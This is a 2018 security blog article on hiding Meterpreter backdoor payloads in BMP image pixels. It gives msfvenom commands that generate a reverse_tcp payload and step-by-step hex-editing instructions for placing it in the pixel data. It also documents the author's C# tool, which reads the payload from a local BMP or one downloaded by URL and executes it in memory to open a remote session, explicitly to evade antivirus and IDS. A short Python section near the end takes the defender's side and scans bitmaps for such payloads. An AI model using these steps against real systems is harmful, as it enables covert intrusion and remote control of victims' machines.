Transferring Backdoor Payloads with BMP Image Pixels | By Damon Mohammadbagher

In this article I want to talk about BMP files and how a bitmap file can be used to transfer data or a malware payload. Transferring or exfiltrating data through images is not a new idea, but I want to talk about it because it is really dangerous, and I want to raise some important questions about this threat, for example: why doesn't anyone care about it?

As usual, I want to talk about transferring backdoor payloads; in this case we can also TEST whether this threat bypasses anti-virus products or IPS/IDS.

Before everything, let me show you one simple BMP Picture.

As you can see in “Picture 1”, we have a black background with red lines. Now tell me, do you see anything wrong or unreasonable in this picture?

Picture 1

Now I want to show you where the unreasonable points in this picture are, which you probably did not notice!

Picture 2: Malware Payload Injection behind Image Pixels

Now you can see where; next I want to talk about why this is dangerous and how you can do it.

  1. Important Questions!
  • Why is transferring payloads or data by images dangerous?
  1. Because, unfortunately, no one thinks of this as an important threat.
  2. Have you ever scanned BMP files with an anti-virus?
  3. Do you use AV real-time detection and real-time scanning on BMP files?
  4. How many of these AVs can detect this threat?
  5. How can you detect this threat when someone publishes BMP files on a target website or an infected website?
  6. Can you use this technique for web attacks or for bypassing a WAF? Or for reading payloads from BMP files in a web attack? (Web pentesters better than me can talk about this.)
  7. For exfiltration over the web and the network, this is one of the best ways to transfer payloads and data over port 80 or 443, especially port 80, with or without encrypting the payload inside the BMP files (important).
  8. Firewalls or IPS/IDS: what can you do about this one, and how many of these tools can detect this technique?
  9. If I use this technique for my backdoors locally with an encrypted payload in pictures, who can detect it and how? Or, if I use this technique with chunked BMP files, meaning the payload is split across more than one picture file, how can you detect it?
  • How can you do this?

First I want to show how you can do it manually, without code, with a simple example; then I will publish my C# code for this technique and explain how to use my tool.

In this case, we want to inject the payload into a BMP image file through its pixels (BMP format only).

Each pixel has a color made of RGB codes. In this technique we inject our payload into the RGB code of each pixel, so we have something like these steps:

Code Behind Pixels
Pixel 1 = R(112) , G(255) , B(10)
Pixel 2 = R(192) , G(34) , B(84)
Pixel 3 = R(111) , G(0) , B(190)

Now we have these RGB payload values: 112,255,10,192,34,84,111,0,190

Decimal == Hex

112 == 70
255 == FF
10 == 0A

192 == C0
34 == 22
84 == 54

111 == 6F
0 == 00
190 == BE

So our pixels hold this Meterpreter payload: 70FF0AC022546F00BE

As you can see in picture 3, we have the hex and decimal values and the color of each pixel.

Picture 3

Now you understand how and where a BMP file should be changed for the injection method.

Injecting a Meterpreter payload into a BMP file manually, step by step:

In this section, I want to explain how you can do these things manually, step by step:

Step 1: First of all, you need a BMP file; on Windows you can create one with MS Paint.

Note: you should do these steps on Windows only, with MS Paint.

As you can see in picture 4, we have a blank BMP file of 700 * 2 pixels.

Picture 4: BMP file with 700 * 2 Pixels

Now we have a blank BMP file of 700 * 2 pixels; save this file in the 24-bit bitmap color format.

Step 2: In Kali Linux, make the Meterpreter payload with one of these commands:

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f c > payload.txt

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f num > payload.txt

Step 3: Now inject the payload from step 2 into the BMP file from step 1, using the hexeditor command in Kali Linux or the “Hex Editor NEO” tool on Windows.

In “Picture 5” you can see Hex Editor NEO showing the BMP file from step 1 before the payload is inserted.

Picture 5

Now, in picture 6, you can see we have three pixels with these payload bytes: “70FF0A-C02254-6F00BE”.

Picture 6

Now you can see what happens inside a BMP when you inject these payload bytes into the image.

To do this, edit the BMP file from step 1 in Kali Linux with the hexeditor command, like picture 7.

With this tool you inject the Meterpreter payload by copy-pasting it from offset 36 up to the end of the file.

Offset 36 in the hex editor (0x36, i.e. 54 in decimal) is the first byte after the BMP header, since the header is 54 bytes long. In picture 5, this section is marked with a green line.

  • Note: Before changing the BMP file, convert your Meterpreter payload from the “0xfc” form to the plain “fc” form, so that it looks like the “Pay.txt” file in picture 9. (important)

Now copy the payload string from “Pay.txt” and paste it into the bitmap file from offset 36 to the end, like pictures 7 and 8.

Picture 7

As you can see in picture 7, your payload starts with “FC48”, and it ends with “FFD5” as in picture 8.

Picture 8

Now save this file.

After these steps you will have something like picture 9: a BMP file with an injected Meterpreter payload.

Picture 9

As you can see in picture 9, the bitmap file now has more pixels.

How many pixels do you need for the Meterpreter payload?

If the Meterpreter payload is 510 bytes, we need 170 pixels for it.

510 bytes of payload, 3 bytes per pixel (one byte each for R + G + B ==> 1+1+1)

510 / 3 = 170 pixels

That means pixels 0 … 169 in MS Paint, as in picture 10.

Picture 10

After making this BMP file, you need code to read the payload back out of the BMP file.

I wrote C# code that reads a Meterpreter payload from a BMP file and executes it in memory like a backdoor. With my tool you can also create a new bitmap file using the injection method, modify existing BMP files to inject a Meterpreter payload, and, finally, download a BMP file by URL over HTTP traffic and execute the payload in memory, like a backdoor. In the future I will add an encryption feature for injecting Meterpreter payloads into BMP files with this tool.

Executing a Meterpreter payload from a BMP file with “NativePayload_Image.exe”, step by step:

Step 1: To see the NativePayload_Image syntax, run the program without any switch, like picture 11:

Picture 11

With my code you can get a very simple Meterpreter session with this syntax for local BMP files.

For backdoor mode with this tool, as in “Picture 11”, you need this syntax:

Syntax: NativePayload_Image.exe bitmap “filename.bmp” [Meterpreter_payload_Length] [Header_Length]

Syntax: NativePayload_Image.exe bitmap “filename.bmp” 510 54

Note: the Meterpreter payload length was 510 (made by the msfvenom tool with “-f c” or “-f num”)

Note: the BMP header length is always 54

Picture 12

As you can see in “Picture 12”, I got a Meterpreter session from a local BMP file; this “NewBitmaImage.bmp” was my BMP file from pictures 9 and 10. So we can make a bitmap file manually with the “Injection Payload Method”, like “Picture 9”, and we can execute the Meterpreter payload from that bitmap file in memory with my C# code, like “Picture 12”.

In this case, the backdoor and the BMP file should be in the same directory, but you can use a path to the BMP file too.

Step 2: Making a new bitmap file with an injected Meterpreter payload using the tool.

In this case, you need a Meterpreter payload made by one of these commands:

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f c > payload.txt

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f num > payload.txt

  • Note: in this step, you should change the output payload from msfvenom as in “picture 13”.
  • Note: change “0xfc , 0x48 , 0x83” to “fc,48,83, ...”

Picture 13

Now, as in picture 14, you can make a new bitmap file with a new file name.

Picture 14

The correct syntax is:

Syntax : NativePayload_Image.exe create “Newfilename.bmp” [Meterpreter_payload]

Syntax : NativePayload_Image.exe create “Newfilename.bmp” fc,48,83,....

Step 3: Modifying existing BMP files to inject a Meterpreter payload.

In this case, you need the payload and a BMP file to add or inject the payload into, like picture 15.

Picture 15

Now use this syntax to modify the file.

Syntax: NativePayload_Image.exe modify “Existfilename.bmp” [header_length] [Meterpreter_payload]

Syntax: NativePayload_Image.exe modify “Existfilename.bmp” 54 fc,48,83,....

Note: the BMP header length is always 54.

Picture 16

As you can see in picture 16, after modifying this file we can see the Meterpreter payload pixels on the black background at “300% zoom”.

As the next picture shows, this modified BMP file works very well.

This time I want to use this BMP file on a website, to be downloaded over HTTP traffic. I will use “MyBMP_to_Modify.bmp”, the file made in the previous step, and set up a web server in Kali Linux so the bitmap can be downloaded by “Url” over HTTP traffic.

Step 4: Downloading the BMP file from a website by “Url”, using HTTP traffic.

So now we have the file “MyBMP_to_Modify.bmp”; I served it from a Kali Linux web server using the Python web server “python -m SimpleHTTPServer”, and finally I got a Meterpreter session over “HTTP Traffic”, like “Picture 17”.

In this case, for downloading the BMP file via URL, the syntax is:

Syntax: NativePayload_Image.exe url “Url” [Meterpreter_payload_Length] [Header_Length]

Syntax: NativePayload_Image.exe url "https://url.com/MyBMP_to_Modify.bmp" 510 54

Picture 17

  • At a glance: This technique is not new, but I think no one cares about this threat, and it is really dangerous. We should check our anti-virus products against it, especially when someone uses an encrypted payload inside a BMP file, which is practically undetectable for most AVs, or when someone splits the payload into chunks across more than one BMP file, which is really dangerous too. I think most AVs do not scan files with the BMP extension by default, neither in real-time nor in manual file-system scans, and I don't think they can detect these payloads inside BMP files (you should check the AVs one by one). And if someone uses this technique for exfiltration, transferring data inside BMP files without any backdoor payload, what can we do for defense and how can we detect this method? (Check it in your AV right now.)
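As an added example (not the article's code and not its NativePayload_Image tool), the following Python builds a constructed 24-bit BMP in memory with the 54-byte header and 700 * 2 layout used above, shows the pixel-to-hex mapping from the “Code Behind Pixels” section and the 510-byte / 170-pixel arithmetic, and answers the detection question from the defender's side: it parses the header instead of trusting offset 54, counts non-black pixels, measures the entropy of the pixel data, and searches the pixel area for the “fc 48 83” bytes the article shows at the start of the msfvenom output. The 4-byte row padding and the on-disk B,G,R byte order of 24-bit BMP are standard format facts, not taken from the article.

```python
import struct
from math import log2

# Constructed for this example (not the article's NativePayload_Image tool): a 24-bit
# BMP with the 54-byte header layout the article assumes, a black background, and
# optional bytes written from the first pixel onward, as pasting at offset 0x36 does.
def build_bmp(width, height, pixel_bytes=b""):
    stride = (width * 3 + 3) & ~3                 # rows are padded to 4-byte multiples
    body = bytearray(stride * height)             # all pixels black
    if len(pixel_bytes) > len(body):
        raise ValueError("payload larger than pixel area")
    body[:len(pixel_bytes)] = pixel_bytes
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + len(body), 0, 0, 54)
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                           len(body), 2835, 2835, 0, 0)
    return bytes(file_hdr + info_hdr + body)

def pixel_data(bmp):
    """Parse the headers and return the raw pixel bytes of a 24-bit BMP."""
    if bmp[:2] != b"BM":
        raise ValueError("not a BMP file")
    off_bits = struct.unpack_from("<I", bmp, 10)[0]     # where pixels start (54 here)
    width, height = struct.unpack_from("<ii", bmp, 18)
    if struct.unpack_from("<H", bmp, 28)[0] != 24:
        raise ValueError("only 24-bit bitmaps are handled")
    stride = (width * 3 + 3) & ~3
    return bmp[off_bits:off_bits + stride * abs(height)]

def pixels_to_hex(bmp, count):
    """Hex of the first `count` pixels, 3 bytes each in on-disk order (B, G, R)."""
    return pixel_data(bmp)[:count * 3].hex().upper()

STAGER_PROLOGUE = bytes.fromhex("fc4883")   # the "fc,48,83" bytes shown in the article

def entropy(data):
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * log2(c / n) for c in counts if c)

def scan_bmp(bmp):
    """Defender-side indicators: nothing here executes any byte from the image."""
    data = pixel_data(bmp)
    non_black = sum(1 for i in range(0, len(data), 3) if data[i:i + 3] != b"\0\0\0")
    return {
        "prologue_offset": data.find(STAGER_PROLOGUE),  # -1 when absent
        "non_black_pixels": non_black,                   # 510-byte payload -> 170
        "pixel_entropy": round(entropy(data), 2),        # 0.0 for an all-black image
    }
```

A plain black 700 * 2 file scores entropy 0.0 with zero non-black pixels, so anything above that in a supposedly blank bitmap deserves a look.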

I will publish C# code in this link very soon:

https://github.com/DamonMohammadbagher/NativePayload_Image

Originally posted on LinkedIn: https://www.linkedin.com/pulse/transferring-backdoor-payloads-bmp-image-pixels-damon-mohammadbagher/

Here you can find the article "Transferring Backdoor Payloads By ICMPv4 Traffic" by Damon Mohammadbagher: https://eforensicsmag.com/download/archaeology-live-response/

July 19, 2018